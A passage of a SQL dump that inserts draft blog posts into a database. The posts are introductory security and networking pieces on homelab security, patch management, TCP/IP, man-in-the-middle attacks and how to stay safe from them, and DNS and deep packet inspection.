scenarios, and outcomes for reflection and improvement.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Blend automation and manual effort to replicate real-world incident responses. CasaOS configurations can aid in setting up automated alerts or scripts to simulate breaches.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Section 3: Future-Proofing Your HomeLab with CasaOS</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Adapting to Cybersecurity Trends and New Technologies</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The cybersecurity landscape evolves quickly. To keep your HomeLab relevant:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Set up regular updates for CasaOS and your Docker containers to integrate the latest tools.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Stay informed about emerging cybersecurity trends, such as zero trust, endpoint security enhancements, and AI-driven threat detection.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Role of HomeLabs in Preparing for Cyber Incident Response</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By simulating real-world attack scenarios, 
a HomeLab helps you build skills in detecting, containing, and responding to cyber incidents. CasaOS further simplifies this process, thanks to its ability to manage multiple virtualized environments for dynamic threat response simulations.\r\n\r\n</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A secure HomeLab is not just a fancy tech endeavour—it’s a powerful tool for enhancing IT security skills, navigating cybersecurity trends, and building preparedness for challenges in the rapidly changing digital space. CasaOS stands out as an incredible base for your HomeLab, whether you’re new to cybersecurity or a seasoned professional looking to upskill.</p>', '', NULL, NULL, 1, 'draft', '2025-01-13 15:30:44', '2026-01-12 21:41:44', 'Projects', 'Building a Secure HomeLab with CasaOS', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(77, 'Patching the Paradox: Securing Cyberspace with Third-Party Reliability', 'patching-the-paradox-securing-cyberspace-with-third-party-reliability', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity is no longer a luxury; it’s a necessity. For organizations navigating the digital age, safeguarding sensitive data and ensuring system integrity are critical to survival in an era marked by increasing cyber threats. Yet, vulnerabilities continue to plague businesses, leaving them exposed to potentially devastating consequences.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This blog explores why identifying vulnerabilities, patching them swiftly, and leveraging reliable third-party solutions are pivotal components of a robust cybersecurity strategy.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Understanding Vulnerabilities</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What are Vulnerabilities?</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A vulnerability in cybersecurity refers to a weakness or flaw in an organization’s system, application, or network that can be exploited by attackers to compromise the system. 
These vulnerabilities can result from design flaws, misconfiguration, outdated software, or insufficient user awareness.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Common Vulnerabilities and Their Impact</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Some typical vulnerabilities include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Unpatched Software:</strong></b> When organizations delay updating software, it creates an opportunity for attackers to exploit known weaknesses.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Weak Passwords:</strong></b> Poor password hygiene provides easy access for hackers.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Misconfigured Networks:</strong></b> Incorrectly set up systems may inadvertently provide unauthorized access to sensitive data.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The impact can range from data theft and financial losses to damaged reputations and regulatory penalties. 
The stakes are high, yet organizations often struggle to stay ahead.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Patching Paradox</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Patching is Often Neglected</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While the concept of patching vulnerabilities seems straightforward, several challenges arise:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Resource Constraints:</strong></b> IT teams may lack the manpower to implement frequent updates.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Downtime Risks:</strong></b> Patches may temporarily disrupt operations, discouraging organizations from addressing issues promptly.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Complexity:</strong></b> Larger organizations must address many systems, making prioritization difficult.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Costs of Falling Behind</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Neglecting timely patching leaves businesses exposed. 
Cybercriminals frequently exploit known vulnerabilities, and failing to keep up with updates significantly increases the risk of breaches.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Role of Reliable Third Parties</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Third-Party Solutions in Cybersecurity</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">One way organizations can address these challenges is by collaborating with third-party vendors who specialize in cybersecurity solutions. These providers ensure their applications are consistently updated and fortified against evolving threats.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Benefits of Reliable Third-Party Providers</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Timely Updates:</strong></b> Trusted vendors prioritize regular updates to address the latest vulnerabilities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Scalability:</strong></b> Third-party solutions are often versatile enough to meet the changing needs of growing businesses.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong 
class=\"font-bold\">Expertise:</strong></b> These companies invest in top-tier cybersecurity professionals who bring expertise that may not be available in-house.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Case Studies and Examples</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Equifax Data Breach (2017)</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The Equifax breach, one of the most infamous cyber incidents in recent memory, exposed the personal records of 147 million people. The attackers exploited an unpatched vulnerability in Apache Struts, a popular web application framework. The failure to address this known issue allowed attackers to infiltrate and steal sensitive data, leading to an immense reputational and financial loss for Equifax.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Mitigation Lesson:</strong></b> Had Equifax implemented timely patches or relied on a third-party vendor that proactively updated its systems, the breach could have been avoided.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Target Data Breach (2013)</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The Target breach, attributed to vulnerabilities in a third-party vendor’s network credentials, resulted in 40 million customers’ credit cards being compromised. 
Attackers exploited inadequate network segmentation and credential security to gain access to the larger system.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Mitigation Lesson:</strong></b> Using reliable third-party providers with robust security practices and ensuring regular patching of systems would have significantly minimized the attack\'s scope.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Best Practices for Organizations</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Steps for Better Vulnerability Management</h3>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Implement a Proactive Patch Management Process:</strong></b> Regularly schedule updates, prioritize critical patches, and test patches in a controlled environment before applying them organization-wide.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Collaborate with Reliable Vendors:</strong></b> Choose third-party providers known for their consistent updates and transparent security practices.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Monitor and Audit Systems:</strong></b> Use cybersecurity monitoring tools to identify vulnerabilities in real time and act quickly.</li>\r\n 	<li 
class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Train Staff in Cybersecurity Awareness:</strong></b> Ensure teams understand and follow best practices, from password management to avoiding phishing scams.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">Adopt Layered Security Measures:</strong></b> Combine patching with firewalls, endpoint protection, and network segmentation.</li>\r\n</ol>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Building a Culture of Cybersecurity</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Make cybersecurity everyone’s responsibility. Encourage open communication and provide ongoing education to ensure staff are equipped with the knowledge to recognize and prevent risks.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Moving Forward</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cyberthreats evolve rapidly, and inaction isn’t an option. Organizations must prioritize patching vulnerabilities while partnering with reliable third-party solutions to create a stronger cybersecurity foundation. The balance between mitigating risks and leveraging external expertise is where businesses can truly thrive in the face of relentless digital threats.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Don’t wait for the next breach to act. 
Start revisiting your organization’s approach to patch management and third-party integrations today to ensure your cybersecurity strategy is future-ready. Together, we can patch the paradox and secure cyberspace effectively.</p>', '', NULL, NULL, 1, 'draft', '2025-01-13 05:00:00', '2026-01-12 21:41:44', 'Information Security', 'Patching the Paradox: Securing Cyberspace with Third-Party Reliability', '', NULL),
(78, 'TCP/IP Simplified: How Data Travels Across the Internet', 'tcp-ip-simplified-how-data-travels-across-the-internet', 'Ever wondered how your messages or emails reach their destination within milliseconds? Think of it like sending a package—except instead of one box, it’s broken into tiny pieces, each taking a unique path before reassembling at the destination perfectly. Welcome to the fascinating world of TCP/IP, the protocol powering modern networking and ensuring data moves securely and accurately across the internet.\r\n<h2>The Origins of TCP/IP</h2>\r\nThe story of TCP/IP starts in the 1970s with ARPANET, one of the first computer networks created by the U.S. Department of Defense. Initially connecting research institutions over telephone lines, ARPANET relied on Network Control Protocol (NCP). However, the limitations of NCP led to the development of TCP (Transmission Control Protocol) combined with IP (Internet Protocol). Together, they formalized the rules that allow data to travel reliably across networks, laying the foundation for today’s global internet.\r\n<h2>How TCP/IP Powers the Internet</h2>\r\nThink of TCP/IP as the digital postal service. When you send data across the internet, TCP/IP ensures it travels through multiple layers, each playing a specific role in delivering that \"package.\" Let\'s break it down using this analogy:\r\n<ol>\r\n 	<li><strong>Application Layer</strong>\r\nAt the top of the TCP/IP structure, the application layer acts as the \"planner.\" This is where user-facing applications like browsers, email clients, or messaging apps prepare data for transmission. For example, when you type a URL into your browser, the application layer creates an HTTP request to retrieve a webpage. It uses protocols like HTTP (for websites) or HTTPS (for secure browsing).</li>\r\n 	<li><strong>Transport Layer</strong>\r\nThe transport layer steps in to split that data into smaller, manageable chunks (called \"segments\" or \"datagrams\"). 
If using TCP, it also guarantees each segment is delivered correctly and in sequence, thanks to a process called the \"three-way handshake,\" which establishes a reliable connection. This layer acts like the postal service tracking system, verifying that everything is on the right path. For fast but less reliable communication, protocols like UDP (User Datagram Protocol) are used. While UDP doesn\'t guarantee delivery or order, it\'s ideal for applications where speed is more important than reliability, like live video streaming.</li>\r\n 	<li><strong>Internet Layer</strong>\r\nThe internet layer (via the IP protocol) acts as the navigator, ensuring data segments (now called \"packets\") take the correct route. It assigns source and destination addresses to each packet, much like labeling a package with an address. Routers interpret this information and forward the packets through networks toward their destination.</li>\r\n 	<li><strong>Network Access Layer</strong>\r\nFinally, the network access layer ensures the physical transmission of data across networks. Picture this as the trucks and postal workers delivering your package. Data is formatted into \"frames,\" which include MAC addresses (unique identifiers for devices on a network). These frames are decapsulated and updated at each stop (like postal hubs), ensuring the data reaches the correct device.</li>\r\n</ol>\r\n<h2>What Happens When the Data Arrives?</h2>\r\nOnce the packets reach their destination, they are reassembled into their original form. The server decodes all the encapsulated information (working backward through the layers) to reveal your request—be it loading a webpage or delivering a file. 
It then processes the request and sends back a response, encapsulating data in headers for the return trip.\r\n\r\nIt’s worth noting that the packets may take entirely different routes back, yet TCP ensures everything arrives intact and in order, no matter the path.\r\n<h2>Exploring the OSI Model</h2>\r\nWhile the TCP/IP model is widely used, another conceptual framework called the OSI (Open Systems Interconnection) model provides a more detailed breakdown. The OSI model divides networking into seven layers, including additional ones for presentation (translating data formats) and session (managing ongoing sessions). While not directly implemented like TCP/IP, the OSI model offers valuable insight into how data transmission works.\r\n<h2>Why TCP/IP Matters for Cybersecurity Learners and Tech Enthusiasts</h2>\r\nUnderstanding TCP/IP is key to grasping how the internet functions, especially for those pursuing careers in cybersecurity or IT. Knowledge of how data packets travel, how connections are established, and the potential vulnerabilities at each layer is foundational for tackling network security challenges like Man-in-the-Middle attacks or unauthorized access.\r\n\r\nDive deeper into this topic to build your expertise. After all, the better you understand the inner workings of TCP/IP, the more prepared you\'ll be to safeguard and optimize the networks powering our digital world.\r\n\r\n&nbsp;', '', NULL, NULL, 1, 'draft', '2025-01-12 13:00:22', '2026-01-12 21:41:44', 'Information Security', 'TCP/IP Simplified: How Data Travels Across the Internet', '', NULL),
(79, 'Understanding Man-in-the-Middle Attacks and How to Stay Safe', 'understanding-man-in-the-middle-attacks-and-how-to-stay-safe', '<h2>What are Man-in-the-Middle (MITM) Attacks?</h2>\r\nMan-in-the-Middle (MITM) attacks are one of the most common and dangerous cybersecurity threats. These attacks occur when cybercriminals position themselves between two parties communicating online (e.g., you and a website) to intercept, monitor, or manipulate the data being transmitted—without either party realizing the attack.\r\n\r\nMITM attacks exploit vulnerabilities in networks, email accounts, web browsers, and even user behavior. The consequences? Stolen sensitive data like login credentials, financial information, and altered communications that benefit the attacker.\r\n\r\nIf you\'ve ever wondered whether your online communications are truly private, it\'s time to take a closer look at MITM attacks—and more importantly, learn how to safeguard yourself.\r\n<h2>How Man-in-the-Middle Attacks Work</h2>\r\n<h3><strong>Step 1: Interception</strong></h3>\r\nThe first step in a MITM attack is intercepting data traveling between two parties. Hackers may exploit unsecured networks, rogue Wi-Fi hotspots (like “Evil Twins”), or phishing links to insert themselves into the communication channel without either party noticing.\r\n\r\nExamples include:\r\n<ul>\r\n 	<li><strong>Public Wi-Fi Eavesdropping</strong> – Hackers target unsecured public networks like those in cafes or airports to intercept communications and data packets.</li>\r\n 	<li><strong>Phishing and Malware</strong> – A fraudulent email with malicious links may download malware onto a user’s device, giving attackers access to the data being transmitted.</li>\r\n</ul>\r\n<h3><strong>Step 2: Decryption</strong></h3>\r\nOnce attackers intercept the communication, they decrypt the data to extract sensitive information. 
While encryption protocols like SSL/TLS protect most modern communications, cybercriminals may still steal encryption keys, spoof IP addresses, or employ brute force attacks to bypass safeguards.\r\n<h2>Common Man-in-the-Middle Attack Techniques</h2>\r\n<ol>\r\n 	<li><strong>Wi-Fi Eavesdropping</strong>\r\nBy setting up rogue Wi-Fi networks that mimic legitimate ones, attackers can trick unsuspecting users into connecting to their fake access points. Once connected, hackers intercept sensitive communication, stealing login credentials or credit card numbers via packet sniffing tools like Wireshark.</li>\r\n 	<li><strong>DNS Spoofing</strong>\r\nThe Domain Name System (DNS) functions like an internet phonebook, mapping domain names to IP addresses. Attackers tamper with DNS entries to redirect users to fake, lookalike websites designed to steal user credentials or personal data.</li>\r\n 	<li><strong>Session Hijacking</strong>\r\nAttackers steal session cookies—the small data files used to verify a user’s identity during active logins—to impersonate users on secure websites like online banking or email platforms. This exploitation, often called \"side-jacking,\" allows attackers to take over active sessions without needing login credentials.</li>\r\n 	<li><strong>Man-in-the-Browser</strong>\r\nThis involves browser-based malware that covertly alters transactions or captures sensitive information without raising suspicion. For instance, malware might modify the details of a bank transfer while presenting legitimate information to the user.</li>\r\n</ol>\r\n<h2>How to Protect Yourself from MITM Attacks</h2>\r\n<h3>1. <strong>Use HTTPS Websites</strong></h3>\r\nAlways ensure the websites you visit display a padlock icon and “HTTPS” in the address bar. HTTPS connections encrypt your communication, making it harder for attackers to intercept or decrypt data. Avoid HTTP-only websites entirely.\r\n<h3>2. 
<strong>Secure Your Wi-Fi</strong></h3>\r\n<ul>\r\n 	<li>Avoid using public Wi-Fi networks for sensitive activities like banking or shopping.</li>\r\n 	<li>Use a Virtual Private Network (VPN) when accessing public networks to create a secure, encrypted tunnel for your data.</li>\r\n 	<li>Keep your home Wi-Fi password-protected and updated.</li>\r\n</ul>\r\n<h3>3. <strong>Beware of Phishing Attempts</strong></h3>\r\nThink twice before clicking on links in unsolicited emails or messages. Verify the sender’s identity and check the URL for misspellings, as phishing websites often mimic legitimate ones.\r\n<h3>4. <strong>Install Browser Extensions</strong></h3>\r\nUse browser extensions like HTTPS Everywhere to redirect you to HTTPS versions of websites automatically.\r\n<h3>5. <strong>Enable Multi-Factor Authentication (MFA)</strong></h3>\r\nMFA adds an extra security layer, ensuring attackers cannot access your accounts even if they acquire your login credentials.\r\n<h3>6. <strong>Run Regular Software Updates</strong></h3>\r\nUpdate your operating system, browsers, and apps regularly to patch vulnerabilities that attackers could exploit.\r\n<h3>7. <strong>Educate Yourself and Your Team</strong></h3>\r\nIf you’re part of an organization, implement cybersecurity awareness training to educate employees about avoiding common threats like phishing, fake Wi-Fi networks, and malicious attachments.\r\n<h2>Why MITM Attacks Are Dangerous</h2>\r\nMan-in-the-Middle attacks are especially malicious because they exploit the systems we use every day for shopping, banking, and even personal conversations. 
Worse, they’re difficult to detect since everything seems normal to the user.\r\n\r\nBy learning the most common attack techniques and adopting proper safeguards, both individuals and organizations can minimize the risks significantly.\r\n<h2>Finally</h2>\r\nMan-in-the-Middle attacks remind us that online security demands proactive measures, from encrypting communications to avoiding risky public networks. Investing a little time into securing your online interactions can prevent significant data breaches and financial losses.', '', NULL, NULL, 1, 'draft', '2025-01-11 22:40:19', '2026-01-12 21:41:44', 'Information Security', 'Understanding Man-in-the-Middle Attacks and How to Stay Safe', '', NULL),
(80, 'Understanding DNS, Deep Packet Inspection, and the Battle Against Internet Censorship', 'understanding-dns-deep-packet-inspection-and-the-battle-against-internet-censorship', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Internet censorship has been a challenge since the very early days of the web. Yet, as the demand for online freedom grows, so do the complexities of censorship techniques. One of the most significant advancements in this field is <b><strong class=\"font-bold\">Deep Packet Inspection (DPI)</strong></b>. But what is it, how does it work, and how can it be mitigated? Let\'s break it down step by step.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Understanding the Basics of DNS and Internet Requests</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Before exploring DPI, it’s essential to understand how your internet connection works at its core.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When you enter a website\'s name, like \"google.com,\" into your browser, your computer sends a request to a <b><strong class=\"font-bold\">DNS server</strong></b> (Domain Name System). 
Think of this as a phonebook for the Internet—it translates the human-readable domain name into a machine-readable IP address.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Here’s how the DNS process works in simple terms:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Your computer asks the DNS server, “What’s the IP address for google.com?”</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">The DNS server responds with the corresponding IP address (e.g., 108.177.127.139).</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Your computer then connects to that IP address and retrieves the requested web page.</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The problem, however, lies in the visibility of this request. Without any protection, your Internet Service Provider (ISP) can see these requests, making your browsing activity public to them.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Evolution of Internet Censorship</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Initially, censors relied on simpler methods to restrict access to websites. 
This could include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Blocking IP addresses:</strong></b> Preventing connections to specific server addresses.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Monitoring DNS queries:</strong></b> Observing and manipulating the DNS server responses to block specific domains.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">However, as users adopted protective measures like encrypted DNS protocols (e.g., DNS-over-HTTPS and DNS-over-TLS), these simple censorship techniques became less effective. This brings us to the more advanced method—<b><strong class=\"font-bold\">Deep Packet Inspection (DPI)</strong></b>.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What is Deep Packet Inspection (DPI)?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Deep Packet Inspection is a sophisticated method ISPs use to inspect the data packets that pass through their network.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When a user tries to access a website, their data is sent in \"packets.\" DPI differs from traditional inspection practices because it examines not only the metadata of the packet (like the IP address) but also the contents of the payload (the actual data being transmitted).</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Here’s how DPI works:</p>\r\n\r\n<ol 
